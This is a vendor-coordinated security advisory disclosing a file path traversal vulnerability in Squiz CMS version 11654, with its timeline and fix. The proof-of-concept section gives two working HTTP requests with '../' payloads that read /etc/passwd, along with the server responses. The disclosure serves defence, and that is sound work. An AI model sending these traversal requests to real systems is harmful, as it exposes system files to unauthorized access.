Skip to navigation Skip to main content Skip to footer

Summary

Name: Squiz CMS – File Path Traversal
Release Date: 30 November 2012
Reference: NGS00330
Discoverer: Robert Ray 
Vendor: Squiz
Vendor Reference: 11846
Systems Affected: Squiz CMS V11654
Risk: High
Status: Published

TimeLine

Discovered: 29 June 2012
Released: 29 June 2012
Approved:  2 July 2012
Reported:  9 July 2012
Fixed:  9 August 2012
Published: 30 November 2012

Description

Squiz CMS V11654 – File Path Traversal

I. VULNERABILITY

The open source platform Squiz CMS version 11654 is vulnerable to file path traversal attacks allowing authenticated attackers to gain access to arbitrary system files.

II. BACKGROUND

Squiz CMS is an open source content management system used by a number of sectors around the globe including Charities, Associations Not For Profit, Corporate, Finance Professional Services, Cultural Institutions, Education, Government Public Sector, Health Social Services, Media
Publishing, Travel Tourism etc.

http://www.squiz.co.uk/showcase/

III. DESCRIPTION

Directory traversal has been found and confirmed within the software as an authenticated user. In some cases it is possible for users to self register within the software if configured for this use case.

Technical Details

IV. PROOF OF CONCEPT

The vulnerabilities detected include method by means of a REST parameter:

GET /__web/Systems/UnregisteredDomainWidget/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: cmsdemo.squiz.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101
Firefox/13.0.1
Accept: /
Accept-Language: en,en-us;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Cookie: PHPSESSID=ifh5vivffao905178oqtl4ptj4

HTTP/1.1 200 OK
Content-type: application/octet-stream
Expires: Sun, 1 Jul 2012 00:00:00
Last-Modified: Sat, 30 Jun 2012 00:00:00
Content-Length: 1236
Date: Fri, 29 Jun 2012 21:46:36 GMT
Server: lighttpd/1.4.28

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

And also by means of the “modeType” GET parameter.

GET /_edit?modeType=../../../../../../../../../../../../../../../../etc/passwd%00  HTTP/1.1
Host: cmsdemo.squiz.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101
Firefox/13.0.1
Accept: */*
Accept-Language: en,en-us;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=ifh5vivffao905178oqtl4ptj4

HTTP/1.1 200 OK
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Content-type: text/html; charset=UTF-8
Date: Fri, 29 Jun 2012 19:56:11 GMT
Server: lighttpd/1.4.28
Content-Length: 1236

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

Fix Information

The vendor has released an update to address this issue. Fixed in version
11846.

http://cms.squizsuite.net/download